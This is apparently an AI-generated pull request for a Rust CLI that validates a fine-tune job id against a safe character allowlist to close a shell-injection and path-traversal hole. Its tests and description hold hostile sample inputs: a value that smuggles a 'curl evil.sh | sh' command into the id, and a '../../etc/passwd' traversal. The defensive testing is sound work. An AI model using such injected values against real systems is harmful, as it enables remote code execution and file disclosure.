### PR TITLE
fix(finetune): validate job.id charset — close shell-injection gap (#1240 follow-up)

### DIFF
--- a/b00t-cli/src/commands/finetune_job.rs
+++ b/b00t-cli/src/commands/finetune_job.rs
@@ -132,6 +132,22 @@ impl FinetuneManifest {
         if self.job.id.trim().is_empty() {
             bail!("[job].id must not be empty");
         }
+        // job.id is interpolated into a `/bin/sh -c` bootstrap string
+        // (`hf_jobs_run_args`) and used as a filesystem path component
+        // (`config-<id>.yaml`, `output-<id>`). Restrict it to a
+        // path/shell-safe allowlist so a manifest can neither inject shell
+        // metacharacters into the cloud job nor traverse directories.
+        if !self
+            .job
+            .id
+            .chars()
+            .all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '_' | '-'))
+        {
+            bail!(
+                "[job].id = {:?} has invalid characters — allowed: ASCII letters, digits, '.', '_', '-'",
+                self.job.id
+            );
+        }
         if self.job.base_model.trim().is_empty() {
             bail!("[job].base_model must not be empty");
         }
@@ -1107,6 +1123,29 @@ s3_bucket = "b00t-finetune-artifacts"
         m.job.id = "  ".to_string();
         let err = m.validate().unwrap_err().to_string();
         assert!(err.contains("[job].id"));
+    }
+
+    #[test]
+    fn rejects_job_id_with_shell_metacharacters() {
+        let mut m = FinetuneManifest::from_toml_str(sample_local_toml()).unwrap();
+        m.job.id = "x.yaml\" && curl evil.sh | sh #".to_string();
+        let err = m.validate().unwrap_err().to_string();
+        assert!(err.contains("invalid characters"), "got: {err}");
+    }
+
+    #[test]
+    fn rejects_job_id_with_path_traversal() {
+        let mut m = FinetuneManifest::from_toml_str(sample_local_toml()).unwrap();
+        m.job.id = "../../etc/passwd".to_string();
+        let err = m.validate().unwrap_err().to_string();
+        assert!(err.contains("invalid characters"), "got: {err}");
+    }
+
+    #[test]
+    fn accepts_normal_job_id() {
+        let mut m = FinetuneManifest::from_toml_str(sample_local_toml()).unwrap();
+        m.job.id = "qwen38-peer-2026-09-01.v2".to_string();
+        assert!(m.validate().is_ok());
     }
 
     #[test]


### PR DESCRIPTION
Follow-up to #1240 (merged into `epic/topical-rag-mesh-a2a-acp` at `08c577fb`).

## Gap

`#1240`'s automated `qwen38` review flagged this as concern #4 ("real injection
vector"); it was not re-raised in the final review and `#1240` merged without
it.

`job.id` is:
- interpolated into the cloud bootstrap `/bin/sh -c` string in
  `hf_jobs_run_args` (via `config-<id>.yaml`), and
- used directly as a filesystem path component (`config-<id>.yaml`,
  `output-<id>`).

`validate()` only checks `job.id` is non-empty. A manifest with
`id = 'x.yaml" && curl … | sh #'` reaches the container shell; `id = "../../…"`
escapes `fine-tune/`.

## Fix

One allowlist check in `validate()` — `job.id` must match
`[A-Za-z0-9._-]+` — plus three tests (shell metachars, path traversal, normal
id still accepted). 39 lines, no behaviour change for any valid manifest
(`qwen38-peer-2026-09-01` etc. still pass).

## Not fixed here (out of scope, non-blocking)

`#1240` review concern #1 (cloud config-path mismatch) is a **false positive**:
`hf upload <repo> <local> <in-repo>` uploads `fine-tune/config-<id>.yaml` to the
in-repo path `config-<id>.yaml`, so the container sees `/data/config-<id>.yaml`
— exactly what `hf_jobs_run_args` references, and what
`hf_jobs_run_args_matches_cloud_train_recipe_shape` asserts. Concerns #2
(`repo_root` inference), #3 (`timeout_hours: f32`), #5 (`oras_available` dead
weight) are non-blocking-by-design per the merged PR.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
